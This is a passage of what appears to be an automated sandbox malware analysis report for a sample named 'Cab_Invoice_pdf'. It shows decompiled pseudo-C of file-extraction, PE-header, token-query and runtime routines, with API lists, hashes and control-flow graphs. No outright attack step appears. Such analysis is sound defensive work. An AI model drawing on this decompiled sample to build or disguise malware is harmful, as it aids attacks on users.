                            							E01311980(__eflags, "Error %d from inflate: %s\n", _t26);
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							E013165F0(__ebx,  &_v68);
                            							return _t37;
                            						}
                            					}
                            				} else {
                            					_push("Error allocating decompression buffer\n");
                            					E01311980(_t47);
                            					return 0;
                            				}
                            			}

                            APIs
                            Strings
                            • Error %d from inflateInit: %s, xrefs: 01311100
                            • Error allocating decompression buffer, xrefs: 01311050
                            • 1.2.11, xrefs: 013110A7
                            • Error %d from inflate: %s, xrefs: 013110E6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: htonl
                            • String ID: 1.2.11$Error %d from inflate: %s$Error %d from inflateInit: %s$Error allocating decompression buffer
                            • API String ID: 2009864989-3188157777
                            • Opcode ID: b81a37e67431225dd98d6ca9d53a1e8bb5b8654fc1c2fdacfad407d031e99ac9
                            • Instruction ID: 71e37c7775126a26b8dd9b2ce0d29a2fa0c4e1388e7e2a95d02720c2a2802712
                            • Opcode Fuzzy Hash: b81a37e67431225dd98d6ca9d53a1e8bb5b8654fc1c2fdacfad407d031e99ac9
                            • Instruction Fuzzy Hash: 5A2184B6A043056BD704AA799C02A8FBF95AF9425CF444439FE48D2215F375D218C7D3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 70%
                            			E01314920() {
                            				void* _v4;
                            				void* _v8;
                            				long _v12;
                            				long _v16;
                            				void* _t18;
                            				int _t22;
                            				int _t25;
                            				void* _t28;
                            				void* _t30;
                            				long* _t32;
                            
                            				_t32 =  &_v12;
                            				_v8 = 0xffffffff;
                            				_t30 = 0;
                            				_v12 = 0;
                            				_v4 = 0;
                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                            					_t22 = GetTokenInformation(_v8, 1, 0, 0,  &_v12); // executed
                            					if(_t22 != 0 || GetLastError() == 0x7a) {
                            						_push(_v16);
                            						_push(1);
                            						_t30 = E013197F8(_t28);
                            						_t32 =  &(_t32[2]);
                            						if(_t30 != 0) {
                            							_t25 = GetTokenInformation(_v12, 1, _t30, _v16,  &_v16); // executed
                            							if(_t25 != 0) {
                            								_push( &_v12);
                            								_push( *_t30);
                            								L01317858();
                            							}
                            						}
                            					}
                            				}
                            				L01319803(_t30);
                            				_t18 = _v8;
                            				if(_t18 != 0xffffffff) {
                            					CloseHandle(_t18);
                            				}
                            				return _v4;
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                            • OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                            • GetLastError.KERNEL32 ref: 01314969
                            • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                            • ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                            • String ID:
                            • API String ID: 995526605-0
                            • Opcode ID: abff934a130d33af1f3b9332b411498b34e348c715207fa55d64e4e554dc1722
                            • Instruction ID: 7b28f13aee81c888c5d56308a413377144d6b4a1f27dc37cd08678112421f0a0
                            • Opcode Fuzzy Hash: abff934a130d33af1f3b9332b411498b34e348c715207fa55d64e4e554dc1722
                            • Instruction Fuzzy Hash: 1F11CE70504211BBDA249F68DD48B5FBFADAF40764F004928F988D1098D730C448CB96
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 83%
                            			E01311320(void* __ecx, void* __edx, void* __eflags) {
                            				void* __ebx;
                            				void* __edi;
                            				void* __ebp;
                            				void* _t7;
                            				signed int _t9;
                            				void* _t10;
                            				signed int _t15;
                            				signed int _t17;
                            				void* _t19;
                            				intOrPtr _t27;
                            				signed int _t28;
                            				intOrPtr _t29;
                            				signed int _t30;
                            				void* _t31;
                            
                            				_t21 = __edx;
                            				_t20 = __ecx;
                            				_t29 =  *((intOrPtr*)(_t31 + 0x10));
                            				_t27 =  *((intOrPtr*)(_t31 + 0x10));
                            				_push(_t29);
                            				_push(_t27);
                            				_t19 = E01311220(__ecx, __edx);
                            				_t7 = E01313C20(__edx, _t27);
                            				if(_t7 != 0xffffffff) {
                            					_t3 = _t29 + 0x12; // 0x12
                            					_t23 = _t3;
                            					_t4 = _t27 + 0x2068; // 0x2068
                            					_push(_t3);
                            					_t9 = E01313EF0(_t19, _t3, __eflags);
                            					_t28 = _t9;
                            					_push( *((intOrPtr*)(_t29 + 0xc)));
                            					L01317864();
                            					_t30 = _t9;
                            					__eflags = _t28;
                            					if(__eflags != 0) {
                            						_t10 = E0131A6CB(_t20, _t19, _t30, 1, _t28); // executed
                            						__eflags = _t10 - 1;
                            						if(__eflags == 0) {
                            							L7:
                            							_push(_t28); // executed
                            							E01319889(_t20, _t21, __eflags); // executed
                            							L01319803(_t19); // executed
                            							__eflags = 0;
                            							return 0;
                            						} else {
                            							__eflags = _t30;
                            							if(__eflags == 0) {
                            								goto L7;
                            							} else {
                            								_t15 = E013117B0(__eflags, "fwrite", "Failed to write all bytes for %s\n", _t23) | 0xffffffff;
                            								__eflags = _t15;
                            								return _t15;
                            							}
                            						}
                            					} else {
                            						_t17 = E013117B0(__eflags, "fopen", "%s could not be extracted!\n", _t23) | 0xffffffff;
                            						__eflags = _t17;
                            						return _t17;
                            					}
                            				} else {
                            					return _t7;
                            				}
                            			}

                            Similarity
                            • API ID: htonl
                            • String ID: %s could not be extracted!$Failed to write all bytes for %s$fopen$fwrite
                            • API String ID: 2009864989-741305175
                            • Opcode ID: 0cf4718d8c7ab291e11da03c5cd514f4812ade174abcfcfd80dac30e57e5753a
                            • Instruction ID: 94b33d94137b5d2a63d3e381a4a4eca97b48a03033c3dc71815f33641ac37000
                            • Opcode Fuzzy Hash: 0cf4718d8c7ab291e11da03c5cd514f4812ade174abcfcfd80dac30e57e5753a
                            • Instruction Fuzzy Hash: E5110473A4131923CA2831BE7C45CEB375DCED267EB040B76FA20D2649FA52951442B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 72%
                            			E01314B30(char _a4, intOrPtr _a8, char _a12, void* _a8188, signed int _a8204, WCHAR* _a8212) {
                            				intOrPtr _v0;
                            				struct _SECURITY_ATTRIBUTES _v16;
                            				signed int _t12;
                            				signed int _t19;
                            				signed int _t21;
                            				WCHAR* _t33;
                            				void* _t37;
                            				signed int _t40;
                            
                            				E01317880();
                            				_t12 =  *0x133c008; // 0xa3433343
                            				_a8204 = _t12 ^ _t40;
                            				_t33 = _a8212;
                            				_t37 = E01314920();
                            				_t27 =  !=  ? _t37 : L"S-1-3-4";
                            				E013149D0( &_a12, 0x1000, L"D:(A;;FA;;;%s)",  !=  ? _t37 : L"S-1-3-4");
                            				LocalFree(_t37);
                            				_push(0);
                            				_v0 = 0xc;
                            				_push( &_a4);
                            				_push(1);
                            				_t19 =  &_a12;
                            				_a8 = 0;
                            				_push(_t19); // executed
                            				L0131785E(); // executed
                            				if(_t19 != 0) {
                            					_t21 = CreateDirectoryW(_t33,  &_v16); // executed
                            					asm("sbb eax, eax");
                            					E0131786A();
                            					return  ~( ~_t21) - 1;
                            				} else {
                            					E0131786A();
                            					return _t19 | 0xffffffff;
                            				}
                            			}

                            APIs
                              • Part of subcall function 01314920: GetCurrentProcess.KERNEL32(00000008,?), ref: 01314941
                              • Part of subcall function 01314920: OpenProcessToken.ADVAPI32(00000000), ref: 01314948
                              • Part of subcall function 01314920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 0131495F
                              • Part of subcall function 01314920: GetLastError.KERNEL32 ref: 01314969
                              • Part of subcall function 01314920: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 01314998
                              • Part of subcall function 01314920: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 013149A9
                              • Part of subcall function 01314920: CloseHandle.KERNEL32(?,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 013149C2
                            • LocalFree.KERNEL32(00000000,01313D37,00000000,?,?,00000000,0131210F,?,?,00000000,?,00000000), ref: 01314B7B
                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,?,?,00000001), ref: 01314B9F
                            • CreateDirectoryW.KERNELBASE(?,?,?), ref: 01314BC8
                            Similarity
                            • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                            • String ID: D:(A;;FA;;;%s)$S-1-3-4
                            • API String ID: 4998090-2855260032
                            • Opcode ID: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction ID: d31da858ae76d3a8675c1b08c6ea0583cebb53ffa34459a206c86423f75a16da
                            • Opcode Fuzzy Hash: 5f927203c77b41aebd140f7094d90218cf432c3ea1ff9e2b93a944efb0f9ac29
                            • Instruction Fuzzy Hash: 0211A9716043019BE628EB29DC49BAB77D9EF84714F404A1EF845C62C5D6349904CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 100%
                            			E01311120(void* __edx, void* _a4) {
                            				char _v4;
                            				signed int _t15;
                            				intOrPtr _t30;
                            				signed int _t32;
                            
                            				_t34 = __edx;
                            				_t35 = _a4;
                            				_v4 = 0;
                            				E01319F16(__edx,  *_a4, 0, 0); // executed
                            				E01319B2B( &_a4, 1, 2,  *_a4); // executed
                            				_t15 = _a4;
                            				if(_t15 != 0x4d || _t15 != 0x5a) {
                            					L8:
                            					return _t15 | 0xffffffff;
                            				} else {
                            					E01319F16(__edx,  *_t35, 0x3c, 0); // executed
                            					E01319B2B( &_v4, 4, 1,  *_t35);
                            					E01319F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
                            					E01319B2B( &_a4, 2, 1,  *_t35);
                            					_t15 = _a4;
                            					if(_t15 != 0xb) {
                            						goto L8;
                            					} else {
                            						if(_t15 != 1) {
                            							if(_t15 != 2) {
                            								goto L8;
                            							} else {
                            								_t32 = 0xa8;
                            								goto L7;
                            							}
                            						} else {
                            							_t32 = 0x98;
                            							L7:
                            							E01319F16(_t34,  *_t35, _v4 + _t32, 0);
                            							E01319B2B( &_v4, 4, 1,  *_t35);
                            							_t30 = _v4;
                            							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
                            							return  ==  ? _t32 | 0xffffffff : _t30;
                            						}
                            					}
                            				}
                            			}

                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction ID: 927cdc730b5f5fe74c634d5fdd7f43d72af10de816f2be815dc7d3c837cf70cc
                            • Opcode Fuzzy Hash: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction Fuzzy Hash: 49210571644302BAEE346F2CCC42F96B399EF4471CF50492DF3D0AA1DAD6B2D8458B46
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 97%
                            			E0132308B(signed int _a4, void* _a8, signed int _a12) {
                            				signed int _v8;
                            				long _v12;
                            				struct _OVERLAPPED* _v16;
                            				long _v20;
                            				char _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				intOrPtr _v48;
                            				void* _v52;
                            				void* __ebx;
                            				signed int _t62;
                            				intOrPtr _t66;
                            				signed char _t68;
                            				signed int _t69;
                            				signed int _t71;
                            				signed int _t73;
                            				signed int _t74;
                            				signed int _t75;
                            				signed int _t76;
                            				intOrPtr _t78;
                            				signed int _t80;
                            				signed int _t84;
                            				signed int _t87;
                            				signed int _t101;
                            				signed int _t102;
                            				signed int _t105;
                            				intOrPtr _t107;
                            				signed int _t112;
                            				signed int _t114;
                            				void* _t116;
                            				signed int _t120;
                            				signed int _t123;
                            				signed int _t125;
                            				void* _t126;
                            
                            				_t62 =  *0x133c008; // 0xa3433343
                            				_v8 = _t62 ^ _t125;
                            				_t105 = _a12;
                            				_v12 = _t105;
                            				_t120 = _a4;
                            				_t116 = _a8;
                            				_v52 = _t116;
                            				if(_t105 != 0) {
                            					__eflags = _t116;
                            					if(_t116 != 0) {
                            						_t101 = _t120 >> 6;
                            						_t114 = (_t120 & 0x0000003f) * 0x30;
                            						_v32 = _t101;
                            						_t66 =  *((intOrPtr*)(0x1346108 + _t101 * 4));
                            						_v48 = _t66;
                            						_v28 = _t114;
                            						_t102 =  *((intOrPtr*)(_t66 + _t114 + 0x29));
                            						__eflags = _t102 - 2;
                            						if(_t102 == 2) {
                            							L6:
                            							_t68 =  !_t105;
                            							__eflags = _t68 & 0x00000001;
                            							if((_t68 & 0x00000001) != 0) {
                            								_t66 = _v48;
                            								L9:
                            								__eflags =  *(_t66 + _t114 + 0x28) & 0x00000020;
                            								if(__eflags != 0) {
                            									E01322807(_t120, 0, 0, 2);
                            									_t126 = _t126 + 0x10;
                            								}
                            								_t69 = E01322C30(_t102, _t114, __eflags, _t120);
                            								__eflags = _t69;
                            								if(_t69 == 0) {
                            									_t107 =  *((intOrPtr*)(0x1346108 + _v32 * 4));
                            									_t71 = _v28;
                            									__eflags =  *(_t107 + _t71 + 0x28) & 0x00000080;
                            									if(( *(_t107 + _t71 + 0x28) & 0x00000080) == 0) {
                            										_v24 = 0;
                            										_v20 = 0;
                            										_v16 = 0;
                            										_t73 = WriteFile( *(_t107 + _t71 + 0x18), _t116, _v12,  &_v20, 0); // executed
                            										__eflags = _t73;
                            										if(_t73 == 0) {
                            											_v24 = GetLastError();
                            										}
                            										goto L28;
                            									}
                            									_t84 = _t102;
                            									__eflags = _t84;
                            									if(_t84 == 0) {
                            										E01322CA6( &_v24, _t120, _t116, _v12);
                            										goto L17;
                            									}
                            									_t87 = _t84 - 1;
                            									__eflags = _t87;
                            									if(_t87 == 0) {
                            										_t86 = E01322E73( &_v24, _t120, _t116, _v12);
                            										goto L17;
                            									}
                            									__eflags = _t87 != 1;
                            									if(_t87 != 1) {
                            										goto L34;
                            									}
                            									_t86 = E01322D85( &_v24, _t120, _t116, _v12);
                            									goto L17;
                            								} else {
                            									__eflags = _t102;
                            									if(_t102 == 0) {
                            										_t86 = E01322A10( &_v24, _t120, _t116, _v12);
                            										L17:
                            										L15:
                            										L28:
                            										asm("movsd");
                            										asm("movsd");
                            										asm("movsd");
                            										_t74 = _v40;
                            										__eflags = _t74;
                            										if(_t74 != 0) {
                            											_t75 = _t74 - _v36;
                            											__eflags = _t75;
                            											L40:
                            											L41:
                            											E0131786A();
                            											return _t75;
                            										}
                            										_t76 = _v44;
                            										__eflags = _t76;
                            										if(_t76 == 0) {
                            											_t116 = _v52;
                            											L34:
                            											_t112 = _v28;
                            											_t78 =  *((intOrPtr*)(0x1346108 + _v32 * 4));
                            											__eflags =  *(_t78 + _t112 + 0x28) & 0x00000040;
                            											if(( *(_t78 + _t112 + 0x28) & 0x00000040) == 0) {
                            												L37:
                            												 *((intOrPtr*)(E0131C9CE())) = 0x1c;
                            												_t80 = E0131C9BB();
                            												 *_t80 =  *_t80 & 0x00000000;
                            												__eflags =  *_t80;
                            												L38:
                            												_t75 = _t80 | 0xffffffff;
                            												goto L40;
                            											}
                            											__eflags =  *_t116 - 0x1a;
                            											if( *_t116 != 0x1a) {
                            												goto L37;
                            											}
                            											_t75 = 0;
                            											goto L40;
                            										}
                            										_t123 = 5;
                            										__eflags = _t76 - _t123;
                            										if(_t76 != _t123) {
                            											_t80 = E0131C998(_t76);
                            										} else {
                            											 *((intOrPtr*)(E0131C9CE())) = 9;
                            											_t80 = E0131C9BB();
                            											 *_t80 = _t123;
                            										}
                            										goto L38;
                            									}
                            									__eflags = _t102 - 1 - 1;
                            									if(_t102 - 1 > 1) {
                            										goto L34;
                            									}
                            									E01322BC3( &_v24, _t116, _v12);
                            									goto L15;
                            								}
                            							}
                            							 *(E0131C9BB()) =  *_t94 & 0x00000000;
                            							 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            							_t80 = E01321788();
                            							goto L38;
                            						}
                            						__eflags = _t102 - 1;
                            						if(_t102 != 1) {
                            							goto L9;
                            						}
                            						goto L6;
                            					}
                            					 *(E0131C9BB()) =  *_t96 & _t116;
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					_t75 = E01321788() | 0xffffffff;
                            					goto L41;
                            				}
                            				_t75 = 0;
                            				goto L41;
                            			}









































                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23a007b3360491f211ecac2786da4701ff0ccb33a80cb15831347a14ca487af5
                            • Instruction ID: 197e4db1c21ffd00655135ca01fdd714c76c637ae47ffdd0b6edec63a9e483c2
                            • Opcode Fuzzy Hash: 23a007b3360491f211ecac2786da4701ff0ccb33a80cb15831347a14ca487af5
                            • Instruction Fuzzy Hash: 9151C471D0022AABDF25BFADCC44FAEBBB9FF0A718F140119E501A7291D7789901CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 466 13218f4-1321908 call 131e926 469 132190a-132190c 466->469 470 132190e-1321916 466->470 471 132195c-132197c call 131e895 469->471 472 1321921-1321924 470->472 473 1321918-132191f 470->473 483 132198a 471->483 484 132197e-1321988 call 131c998 471->484 474 1321942-1321952 call 131e926 FindCloseChangeNotification 472->474 475 1321926-132192a 472->475 473->472 477 132192c-1321940 call 131e926 * 2 473->477 474->469 487 1321954-132195a GetLastError 474->487 475->474 475->477 477->469 477->474 485 132198c-132198f 483->485 484->485 487->471
                            C-Code - Quality: 100%
                            			E013218F4(void* __eflags, signed int _a4) {
                            				intOrPtr _t13;
                            				int _t15;
                            				void* _t21;
                            				signed int _t33;
                            				long _t35;
                            
                            				_t33 = _a4;
                            				if(E0131E926(_t33) != 0xffffffff) {
                            					_t13 =  *0x1346108; // 0x105eaf0
                            					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                            						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                            							goto L7;
                            						} else {
                            							goto L6;
                            						}
                            					} else {
                            						L6:
                            						_t21 = E0131E926(2);
                            						if(E0131E926(1) == _t21) {
                            							goto L1;
                            						}
                            						L7:
                            						_t15 = FindCloseChangeNotification(E0131E926(_t33)); // executed
                            						if(_t15 != 0) {
                            							goto L1;
                            						}
                            						_t35 = GetLastError();
                            						L9:
                            						E0131E895(_t33);
                            						 *((char*)( *((intOrPtr*)(0x1346108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                            						if(_t35 == 0) {
                            							return 0;
                            						}
                            						return E0131C998(_t35) | 0xffffffff;
                            					}
                            				}
                            				L1:
                            				_t35 = 0;
                            				goto L9;
                            			}









                            APIs
                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,01321812,?), ref: 0132194A
                            • GetLastError.KERNEL32(?,01321812,?), ref: 01321954
                            • __dosmaperr.LIBCMT ref: 0132197F
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                            • String ID:
                            • API String ID: 490808831-0
                            • Opcode ID: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction ID: 7712a720c87032ec3d63ec1deb2b8941de7effacdfa71fff847beda122c05e30
                            • Opcode Fuzzy Hash: 29d2c630784377cf0ccebc878c102d6d304470df9d813f225e95b50307b17152
                            • Instruction Fuzzy Hash: E1016133B0423517DBBA323CA94477DAB4E8B8677CF250129ED09CB1C6DE65D88182D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 491 132276e-1322786 call 131e926 494 1322788-132278d call 131c9ce 491->494 495 1322799-13227af SetFilePointerEx 491->495 500 1322793-1322797 494->500 497 13227c0-13227ca 495->497 498 13227b1-13227be GetLastError call 131c998 495->498 497->500 501 13227cc-13227e1 497->501 498->500 504 13227e6-13227eb 500->504 501->504
                            C-Code - Quality: 86%
                            			E0132276E(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				void* _v12;
                            				void* _t15;
                            				int _t16;
                            				signed int _t19;
                            				signed int _t32;
                            				signed int _t33;
                            				signed int _t36;
                            
                            				_t36 = _a4;
                            				_push(_t32);
                            				_t15 = E0131E926(_t36);
                            				_t33 = _t32 | 0xffffffff;
                            				if(_t15 != _t33) {
                            					_push(_a16);
                            					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
                            					if(_t16 != 0) {
                            						if((_v12 & _v8) == _t33) {
                            							goto L2;
                            						} else {
                            							_t19 = _v12;
                            							_t39 = (_t36 & 0x0000003f) * 0x30;
                            							 *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0x1346108 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x30) & 0x000000fd;
                            						}
                            					} else {
                            						E0131C998(GetLastError());
                            						goto L2;
                            					}
                            				} else {
                            					 *((intOrPtr*)(E0131C9CE())) = 9;
                            					L2:
                            					_t19 = _t33;
                            				}
                            				return _t19;
                            			}












                            APIs
                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,?,00000000,?,00000000,?,?,?,0132281D,?,00000000,00000002,00000000), ref: 013227A7
                            • GetLastError.KERNEL32(?,0132281D,?,00000000,00000002,00000000,?,01323143,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 013227B1
                            • __dosmaperr.LIBCMT ref: 013227B8
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID:
                            • API String ID: 2336955059-0
                            • Opcode ID: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction ID: 5088f0b0bf909b83912d538d01cba551c42da1468600141f4c559c53e6c25e06
                            • Opcode Fuzzy Hash: 02afdac78791472bed70760892371673686be6b007f06494764c2f287149006d
                            • Instruction Fuzzy Hash: 3E01F037614519ABCF159F6DDC048AF7B1EDB85334F140255F8119B185EB71DD4187D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 100%
                            			E01327CE3(void* __ecx) {
                            				void* _t6;
                            				void* _t14;
                            				void* _t18;
                            				WCHAR* _t19;
                            
                            				_t14 = __ecx;
                            				_t19 = GetEnvironmentStringsW();
                            				if(_t19 != 0) {
                            					_t12 = (E01327C29(_t19) - _t19 >> 1) + (E01327C29(_t19) - _t19 >> 1);
                            					_t6 = E01320A25(_t14, (E01327C29(_t19) - _t19 >> 1) + (E01327C29(_t19) - _t19 >> 1)); // executed
                            					_t18 = _t6;
                            					if(_t18 != 0) {
                            						E013189A0(_t18, _t19, _t12);
                            					}
                            					E013209EB(0);
                            					FreeEnvironmentStringsW(_t19);
                            				} else {
                            					_t18 = 0;
                            				}
                            				return _t18;
                            			}








                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 01327CE7
                            • _free.LIBCMT ref: 01327D20
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01327D27
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: EnvironmentStrings$Free_free
                            • String ID:
                            • API String ID: 2716640707-0
                            • Opcode ID: e38150cedffa83540653268b21f5dd56ab4ee496d2931e04839aa9abb396bae7
                            • Instruction ID: 7ff5257842873359f69482adfc0badcc81f228ff35d7f2fb12ec8c50d2792b7a
                            • Opcode Fuzzy Hash: e38150cedffa83540653268b21f5dd56ab4ee496d2931e04839aa9abb396bae7
                            • Instruction Fuzzy Hash: 14E09B3B50453A6BE226363D7C48D7F3A1DEFD2979B650125F40497146EE208D0641F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 519 131edbe-131edd0 call 1318310 522 131ef61 519->522 523 131edd6-131edd9 519->523 525 131ef64-131ef69 call 131eb2a 522->525 523->522 524 131eddf-131ede5 523->524 527 131eea5-131eec0 call 1325ffe 524->527 528 131edeb-131edee 524->528 533 131ef6a-131ef6f call 1318356 525->533 537 131eec2-131eec5 527->537 538 131eec7-131eece 527->538 528->527 531 131edf4-131edf7 528->531 531->527 532 131edfd-131ee00 531->532 532->527 535 131ee06-131ee09 532->535 535->527 539 131ee0f-131ee12 535->539 537->538 541 131ef01-131ef0f call 131eac0 537->541 538->541 542 131eed0-131eedf SetConsoleCtrlHandler 538->542 543 131ee24-131ee2d call 13244a9 539->543 544 131ee14-131ee17 539->544 554 131ef11-131ef29 541->554 555 131ef37-131ef45 call 131ef58 541->555 546 131eee1-131eee8 542->546 547 131eeea-131eefe call 131c9bb GetLastError 542->547 553 131ee1e-131ee1f 543->553 558 131ee2f-131ee35 543->558 544->543 549 131ee19-131ee1c 544->549 546->541 547->541 549->543 549->553 553->525 554->555 557 131ef2b-131ef35 call 131f6ac 554->557 555->553 567 131ef4b-131ef4d 555->567 557->555 561 131ee37-131ee47 call 1320a25 558->561 562 131ee5d-131ee6d call 131eb02 558->562 561->553 571 131ee49-131ee5a call 13189a0 561->571 562->553 570 131ee6f-131ee7a 562->570 567->533 572 131ee7c-131ee88 570->572 573 131ee9e-131eea0 570->573 571->562 572->573 575 131ee8a-131ee8d 572->575 573->533 577 131ee9b 575->577 578 131ee8f-131ee99 575->578 577->573 578->575 578->577
                            C-Code - Quality: 87%
                            			E0131EDBE(signed int** __edx, void* __eflags) {
                            				signed int* _t26;
